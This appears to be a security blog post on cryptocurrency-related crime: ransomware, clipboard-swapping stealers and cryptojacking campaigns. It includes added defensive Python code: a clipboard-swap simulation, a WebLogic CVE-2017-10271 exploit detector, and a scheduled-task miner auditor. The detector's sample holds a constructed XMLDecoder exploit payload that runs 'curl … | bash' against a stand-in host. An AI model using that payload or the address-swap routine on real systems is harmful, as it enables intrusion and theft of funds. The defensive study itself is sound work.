Crypto rush: the criminal appeal of cryptocurrency

Treasure is no longer only gold or cash, but history seems to repeat itself: as long as cryptocoins keep their value, they remain an extremely attractive target.

The past week has been another illustration of how appealing cryptocoins are to criminals. It is no longer surprising that most ransomware demands payment in cryptocurrency, and new attack techniques such as cryptojacking have emerged over the past few months, widening the range of cryptocurrency-driven threats. Today, we are gathering insights on the latest cryptocurrency risks and criminal trends.

Ransom and theft strategies: classic processes applied to the crypto-world

GandCrab: “One of the most aggressive ransomware of 2018”

Ransomware is currently one of the most prominent cyber threats, and GandCrab has set the bar high for 2018. This malware is a file-encrypting program: once a few social engineering tricks have got it onto a machine, it locks the victim's files. According to Europol it is already one of the most aggressive forms of ransomware of the year, with more than 50,000 victims, each asked for a ransom of USD 300-500 in the Dash cryptocurrency. This week, a free decryption tool was released by the Romanian Police in collaboration with Europol and Bitdefender, which should eventually limit the financial gain of the criminals behind it.

Crypto Theft: from malware to simple real-life tricks

Demanding cryptocurrency as a ransom, or illegally using other people's devices to mine it, are two currently popular approaches that do not involve stealing coins directly from their owners. Direct theft does happen too, as the following cases show.


  • Crypto stealer malware

Early this year, a trojan cryptocoin stealer called Evrial was discovered. The malware silently monitors the Windows clipboard and replaces legitimate wallet addresses and payment URLs with addresses controlled by the attackers, who may simply have bought access to the platform as a service. According to ElevenPaths, the operation had netted 0.122 BTC and 0.0131 LTC at the time of analysis. The platform is also sold as a service on a Russian criminal forum for 1,500 rubles.

Last week, Palo Alto Networks reported a new crypto-stealing malware named ComboJack. It operates much like Evrial, stealing cryptocurrency and electronic money by swapping the recipient address in the clipboard before the victim finalizes a payment. Victims' devices are infected through a phishing campaign whose emails carry a PDF that purports to contain details of a lost passport.
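To make the clipboard-swap technique used by Evrial and ComboJack concrete, here is an added Python example (not code from the page or from either malware family) that simulates the swap and shows the check a wallet front-end, or a careful user, should perform before sending. It assumes legacy Bitcoin addresses (Base58Check with a version byte); the user's address is the public Bitcoin genesis address, and the attacker's address is derived in the code from a fixed string, so it has a valid checksum but belongs to no real wallet.

```python
"""Clipboard-swap stealer simulation and the corresponding paste check.

Added example, not the page's or the malware's code. The checksum logic is
standard Base58Check (Bitcoin legacy addresses); the attacker address is
derived from a fixed string so it is well-formed but fictitious.
"""
import hashlib
import re

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Real, public: the address paid by the Bitcoin genesis block.
USER_ADDRESS = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"

# Legacy P2PKH ('1...') and P2SH ('3...') addresses, as a stealer would match them.
BTC_LEGACY_RE = re.compile(r"\b[13][1-9A-HJ-NP-Za-km-z]{25,34}\b")


def _checksum(payload: bytes) -> bytes:
    """First four bytes of SHA256(SHA256(payload)): the Base58Check checksum."""
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]


def base58check_encode(payload: bytes) -> str:
    data = payload + _checksum(payload)
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = B58[rem] + out
    # Each leading zero byte is represented by a leading '1'.
    pad = len(data) - len(data.lstrip(b"\x00"))
    return "1" * pad + out


def base58check_decode(addr: str) -> bytes:
    """Return the payload (version byte + hash) or raise ValueError."""
    n = 0
    for ch in addr:
        idx = B58.find(ch)
        if idx < 0:
            raise ValueError("character outside the base58 alphabet")
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    pad = len(addr) - len(addr.lstrip("1"))
    data = b"\x00" * pad + body
    if len(data) < 5 or _checksum(data[:-4]) != data[-4:]:
        raise ValueError("checksum mismatch")
    return data[:-4]


def is_valid_btc_address(addr: str) -> bool:
    """Well-formed legacy address: version 0x00 (P2PKH) or 0x05 (P2SH) + 20-byte hash."""
    try:
        payload = base58check_decode(addr)
    except ValueError:
        return False
    return len(payload) == 21 and payload[0] in (0x00, 0x05)


# Constructed attacker address: valid checksum, fictitious key. A real stealer's
# address is just as well-formed, so a format check alone cannot catch the swap.
ATTACKER_ADDRESS = base58check_encode(
    b"\x00" + hashlib.sha256(b"constructed attacker key").digest()[:20])


def hijack_clipboard(clipboard_text: str, attacker_addr: str) -> str:
    """What the stealer does on each clipboard change: every address it
    recognises is replaced with the attacker's; everything else is kept."""
    return BTC_LEGACY_RE.sub(attacker_addr, clipboard_text)


def paste_is_trusted(expected: str, pasted: str) -> tuple:
    """Check before broadcasting: the pasted destination must be well-formed
    AND identical to the address shown on the invoice being paid.
    Returns (ok, reason)."""
    if not is_valid_btc_address(pasted):
        return False, "destination is not a well-formed address"
    if pasted != expected:
        return False, "destination differs from the invoice address (clipboard tampered?)"
    return True, "ok"


if __name__ == "__main__":
    invoice = f"Pay 0.1 BTC to {USER_ADDRESS}"
    print("clipboard after stealer:", hijack_clipboard(invoice, ATTACKER_ADDRESS))
    print(paste_is_trusted(USER_ADDRESS, USER_ADDRESS))
    print(paste_is_trusted(USER_ADDRESS, ATTACKER_ADDRESS))
```

The design point is the second check in `paste_is_trusted`: the attacker's address passes every syntactic test, so the only defence is comparing the full pasted string against the address obtained through a second channel (the invoice, a QR code, the payee's page), not just its first few characters.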


  • Physical cybersecurity

Apple co-founder Steve Wozniak was also recently ‘robbed‘ when he sold seven bitcoins: the buyer paid with a stolen credit card number, so the card payment was later cancelled, but the bitcoins had already been transferred. This is another case where the physical and cyber worlds collide, which CBR Online lists as one of the five most prominent threats of 2018.

In December and January, the so-called “Big Bitcoin Heist” saw around 600 servers used for bitcoin mining stolen from Icelandic data centres, adding outright hardware theft to the list of cryptocoin burglary techniques. The loss is estimated at $2 million.


Ransomware and crypto theft can both be very profitable, but only for a limited time: awareness rises, decryption tools are deployed and investigations proceed. This has led criminals to think of new ways to get more cryptocoins. Research from both Cisco and Kaspersky Lab shows that cryptojacking is now favoured over ransomware as a way to obtain cryptocurrency: it takes little effort to infect a computer, the infection is less likely to be detected, and the result is a very lucrative business.


Cryptojacking: the new malicious trend

Cryptojacking consists of intruders infecting other people's computers to run crypto-mining for their own benefit. The trend seems to have started back in September 2017 with the introduction of the Coinhive JavaScript library, which enables Monero mining directly from a browser. According to Kaspersky Lab, the most successful group made over $7 million in only six months using a botnet of about 10,000 devices. This puts any end user at risk, on consumer and corporate networks alike.

So how do computers get infected?

  • Malvertising

One famous example involves YouTube, where ads served on the platform were used as ground zero to spread the mining script.


  • Cracked games
  • Pirated software


In late February, researchers at Trend Micro discovered a new campaign exploiting CVE-2017-10271, a remote code execution vulnerability in the Oracle WebLogic WLS-WSAT component that was patched in October 2017. The campaign delivers two Monero miners at once, a 64-bit and a 32-bit variant, so that the payload runs on either architecture without further attacker interaction.

Earlier this year, a separate campaign against WebLogic and PeopleSoft servers is said to have brought the attackers $226,000 worth of cryptocoins.
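As an added example (not code from the page, Trend Micro or the campaigns above), the following Python detector flags WLS-WSAT exploitation attempts of the kind behind both WebLogic campaigns, for web-server or proxy logs that retain request bodies. It relies on the publicly documented shape of CVE-2017-10271 requests: a POST to a `/wls-wsat/` endpoint whose SOAP header carries a `WorkContext` element containing an XMLDecoder object graph (`<java>`, `<void class="java.lang.ProcessBuilder">`, ...) instead of opaque session data. The sample requests, the download host (a documentation address) and the dropper command are constructed for this example.

```python
"""Detector for CVE-2017-10271 (WebLogic WLS-WSAT) exploitation attempts.

Added example; the request samples below are constructed, not captures.
"""
import re
import xml.etree.ElementTree as ET

WSAT_PATH_RE = re.compile(r"^/wls-wsat/\w+")
SOAP_ENV = "{http://schemas.xmlsoap.org/soap/envelope/}"
WORKAREA = "{http://bea.com/2004/06/soap/workarea/}"

# Classes the public exploit chains instantiate through XMLDecoder to run
# commands or drop files. Extend as needed.
DANGEROUS_CLASSES = {
    "java.lang.ProcessBuilder",
    "java.lang.Runtime",
    "java.io.FileOutputStream",
    "java.io.PrintWriter",
}


def inspect_request(method: str, path: str, body: str) -> dict:
    """Classify one HTTP request. Returns 'suspicious', the list of 'reasons'
    and any <string> arguments found under a dangerous class."""
    result = {"suspicious": False, "reasons": [], "strings": []}
    if method.upper() != "POST" or not WSAT_PATH_RE.match(path):
        return result
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        result["suspicious"] = True
        result["reasons"].append("POST to wls-wsat with a body that is not well-formed XML")
        return result
    ctx = root.find(f"{SOAP_ENV}Header/{WORKAREA}WorkContext")
    if ctx is None:
        return result  # no WorkContext header: ordinary WS-AT traffic
    for el in ctx.iter():
        if el.tag == "java":
            # Legitimate WorkContext content is opaque session data, not an
            # XMLDecoder document; a <java> element here is the exploit signature.
            result["suspicious"] = True
            result["reasons"].append("XMLDecoder object graph (<java>) inside WorkContext")
        cls = el.get("class", "")
        if cls in DANGEROUS_CLASSES:
            result["suspicious"] = True
            result["reasons"].append(f"<{el.tag}> instantiates {cls}")
            result["strings"].extend((s.text or "").strip() for s in el.iter("string"))
    return result


def scan_log(entries) -> list:
    """entries: iterable of (method, path, body). Returns (index, result) per hit."""
    hits = []
    for i, (method, path, body) in enumerate(entries):
        r = inspect_request(method, path, body)
        if r["suspicious"]:
            hits.append((i, r))
    return hits


# Constructed exploit request in the shape of the public proof of concept.
# 198.51.100.10 is a documentation address; the script name is made up.
EXPLOIT_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8.0_131" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0"><string>/bin/bash</string></void>
            <void index="1"><string>-c</string></void>
            <void index="2"><string>curl -s http://198.51.100.10/xmr.sh | bash</string></void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>"""

# Constructed benign request to the same endpoint (no WorkContext header).
BENIGN_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header/>
  <soapenv:Body><ping/></soapenv:Body>
</soapenv:Envelope>"""

SAMPLE_LOG = [
    ("GET", "/console/login/LoginForm.jsp", ""),
    ("POST", "/wls-wsat/CoordinatorPortType", BENIGN_BODY),
    ("POST", "/wls-wsat/CoordinatorPortType", EXPLOIT_BODY),
]

if __name__ == "__main__":
    for i, r in scan_log(SAMPLE_LOG):
        print(f"entry {i}: {r['reasons']} strings={r['strings']}")
```

The extracted `strings` are the part worth pivoting on in an investigation: they name the dropper host and the script that installs the miner, which is where the 32-bit and 64-bit variants come from.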

In most cases the mining goes unnoticed, because its only visible effects are higher power consumption and, eventually, slower devices. Tesla, however, recently had to deal with a leak of proprietary data after one of its cloud accounts was compromised to mine cryptocurrency: security researchers found that a Kubernetes console in the account was being used to run a well-hidden cryptojacking campaign.

Some malware scanners are starting to detect mining malware. According to our experts, though, the best way to remain protected is to patch and update systems and software regularly and, above all, to raise cyber awareness, since most infections start with phishing.

Who is behind it?

The report by Kaspersky Lab profiles three groups of mining criminals:

Group 1

  • Built a botnet of about 10,000 machines, ranging from consumer to corporate PCs.
  • Mining Monero
  • Prerequisite: unpatched vulnerabilities
  • Further techniques: process hollowing and manipulation of the Microsoft Windows Task Scheduler for persistence

Group 2

  • Specific targets
  • Prior access to the network
  • Hard-coded configuration in the PowerShell script
  • Private Monero mining pool

Group 3

  • Sells the tooling but does not use it
  • Customizable kits, inspired by kits advertised on the Dark Web
  • Less advanced actors can now cryptojack too
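The persistence and pool details in these profiles leave artefacts a defender can audit. The following added Python example (not from the page or from Kaspersky Lab) parses Windows Task Scheduler task definitions, the XML that `schtasks /Query /XML` produces, and flags actions that point at a miner: stratum pool URLs (private pools included), known miner binaries and flags, a Monero-format wallet address, or an encoded PowerShell launcher of the kind a hard-coded mining script would be started with. The three task definitions are constructed in the real Task Scheduler schema, and the wallet address is a base58 string of the right shape, not a real wallet.

```python
"""Audit Windows scheduled tasks for cryptomining persistence.

Added example, not the page's or Kaspersky Lab's code. The task XML below is
constructed in the Task Scheduler schema; the Monero address is fake.
"""
import re
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Indicator patterns applied to "<Command> <Arguments>" of each Exec action.
MINER_PATTERNS = [
    (re.compile(r"stratum\+(?:tcp|ssl)://", re.I), "stratum mining-pool URL"),
    (re.compile(r"\b(?:xmrig|xmr-stak|cpuminer|minerd)\b", re.I), "known miner binary name"),
    (re.compile(r"--donate-level|--cpu-max-threads-hint|cryptonight", re.I), "xmrig-style mining flag"),
    # Monero standard (4...) and sub- (8...) addresses are 95 base58 characters.
    (re.compile(r"\b[48][1-9A-HJ-NP-Za-km-z]{94}\b"), "Monero wallet address"),
    (re.compile(r"powershell(?:\.exe)?.*\s-(?:e|ec|enc|encodedcommand)\b", re.I), "encoded PowerShell launcher"),
]


def exec_actions(xml_text: str):
    """Yield (command, arguments) for every <Exec> action in a task definition."""
    root = ET.fromstring(xml_text)
    for action in root.iter(f"{NS}Exec"):
        cmd = (action.findtext(f"{NS}Command") or "").strip()
        args = (action.findtext(f"{NS}Arguments") or "").strip()
        yield cmd, args


def audit_task(name: str, xml_text: str) -> list:
    """Return one finding string per matched indicator; empty if clean."""
    findings = []
    for cmd, args in exec_actions(xml_text):
        line = f"{cmd} {args}".strip()
        for pattern, label in MINER_PATTERNS:
            if pattern.search(line):
                findings.append(f"{name}: {label}: {line[:70]}")
    return findings


def audit_tasks(tasks: dict) -> dict:
    """tasks: {task name: xml}. Returns only the tasks that have findings."""
    report = {}
    for name, xml_text in tasks.items():
        hits = audit_task(name, xml_text)
        if hits:
            report[name] = hits
    return report


def _task_xml(command: str, arguments: str) -> str:
    """Build a minimal task definition in the Task Scheduler schema (constructed)."""
    return f"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author">
    <Exec><Command>{command}</Command><Arguments>{arguments}</Arguments></Exec>
  </Actions>
</Task>"""


FAKE_XMR_ADDRESS = "4" + "9dUbW3Xq" * 11 + "Zk7mPs"  # 95 chars, not a real wallet

# Constructed samples: one clean updater, one miner hiding behind a familiar
# task name, one encoded PowerShell loader.
SAMPLE_TASKS = {
    "Updater": _task_xml(r"C:\Program Files\Example\updater.exe", "--check"),
    "GoogleUpdateTaskMachineUA": _task_xml(
        r"C:\ProgramData\Intel\svchost.exe",
        f"-o stratum+tcp://pool.example.net:3333 -u {FAKE_XMR_ADDRESS} -p x --donate-level 1"),
    "SystemHealth": _task_xml(
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "-nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
}

if __name__ == "__main__":
    for name, hits in audit_tasks(SAMPLE_TASKS).items():
        print(name)
        for h in hits:
            print("  ", h)
```

On a live host the XML comes from `schtasks /Query /TN <name> /XML` (or the task files under `C:\Windows\System32\Tasks`); the point of matching on the pool URL and wallet address rather than the binary name is that the miner in the second task is renamed to look like a system process, which is exactly what a task-scheduler-based persistence gains the attacker.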



Cryptocurrency is currently a valuable asset at the centre of cyber-attack trends, and as its value rises, so should the concern. Thefts can be carried out with physical, real-world tactics as well as with malware, which makes crypto theft disturbingly easy. Furthermore, cryptojacking has been a major rising trend over the past few weeks: it secretly and illegally uses people's or organisations' devices to mine cryptocoins, in some cases with damaging consequences such as data leaks. Finally, the existence of cryptojacking-as-a-service platforms proves that demand for such tools from financially motivated criminals is not about to fade, making crypto security a major concern for the near future.
